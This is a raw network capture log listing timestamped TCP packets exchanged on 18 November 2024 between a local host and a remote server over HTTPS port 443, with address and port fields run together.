                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714302063 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714313030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714359045 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714720011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714735985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714792013 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714802980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.714853048 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.715244055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.715260029 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.715332985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.715344906 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.715389967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752336979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752361059 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752451897 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752464056 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752527952 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752722979 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752738953 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752787113 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752798080 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752862930 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.752862930 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753355980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753386021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753459930 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753474951 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753500938 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753518105 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753849983 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753869057 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753931999 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753943920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.753995895 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.754441977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.754456997 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.754515886 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.754527092 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.754574060 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.804512024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.804529905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.804591894 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.804605007 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.804657936 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.829828024 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.829845905 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.829927921 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.829946995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.829998970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.830949068 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.830962896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.831024885 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.831036091 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.831087112 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834359884 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834376097 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834439039 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834450960 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834501028 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834511995 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834527016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834568977 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834579945 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834604979 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834633112 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834693909 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834707022 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834774971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834784985 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834816933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834831953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834831953 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834837914 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834849119 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834872961 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.834908962 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835299969 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835323095 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835357904 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835375071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835398912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.835417032 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871301889 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871330976 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871392965 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871411085 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871437073 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871485949 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871766090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871782064 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871843100 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871854067 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871880054 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.871896982 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872478962 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872504950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872544050 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872555017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872582912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.872622967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873166084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873182058 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873241901 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873253107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.873300076 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876684904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876702070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876760960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876792908 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.876832008 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923299074 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923333883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923403025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923430920 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923463106 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.923485041 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949064970 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949095011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949192047 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949208021 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949260950 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949450016 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949474096 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949516058 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949527025 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949553967 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949573994 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949865103 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949914932 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949951887 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949968100 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.949990988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.950017929 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.951948881 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.951988935 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952049971 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952061892 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952090025 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952181101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952581882 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952604055 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952671051 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952677011 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.952734947 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953241110 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953286886 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953305960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953310966 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953342915 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953361988 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953474045 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953515053 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953548908 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953555107 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.953583002 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.989592075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.989618063 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.989713907 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.989744902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.990776062 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.990794897 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.990845919 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.990853071 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.990885019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991163015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991189003 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991225958 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991231918 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991276026 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991590977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991612911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991657019 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991663933 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.991689920 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992058039 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992084980 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992119074 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992125034 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992156029 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992541075 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992557049 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992621899 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:48.992628098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.042223930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.042244911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.042330980 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.042355061 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068460941 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068487883 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068528891 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068538904 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068567038 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068619967 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068655968 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068669081 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068680048 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068706036 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068754911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068774939 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068803072 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068809032 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.068831921 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.070738077 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.070756912 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.070847034 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.070854902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.071897030 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.071914911 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.071974993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.071981907 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.072813988 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.072832108 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.072906017 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.072912931 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.073296070 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.073312998 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.073355913 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.073362112 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.073385954 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.108506918 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.108539104 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.108572960 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.108597040 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.108608007 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109103918 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109116077 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109169006 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109174967 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109864950 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109879017 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109934092 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.109941006 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.110969067 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.110982895 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111037016 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111043930 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111519098 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111532927 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111578941 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111584902 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.111613989 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.112055063 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.112067938 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.112126112 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.112133026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.159660101 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.160861015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.160881042 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.160939932 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.160947084 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.160989046 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186352015 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186383009 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186445951 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186451912 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186511993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186511993 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186748028 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186773062 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186810970 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186817884 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186837912 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.186856985 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187201977 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187215090 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187267065 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187273026 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187338114 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187804937 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187818050 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187869072 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187875986 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.187912941 CET49717443192.168.2.16172.67.185.54
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189740896 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189754963 CET44349717172.67.185.54192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:49.189805031 CET49717443192.168.2.16172.67.185.54
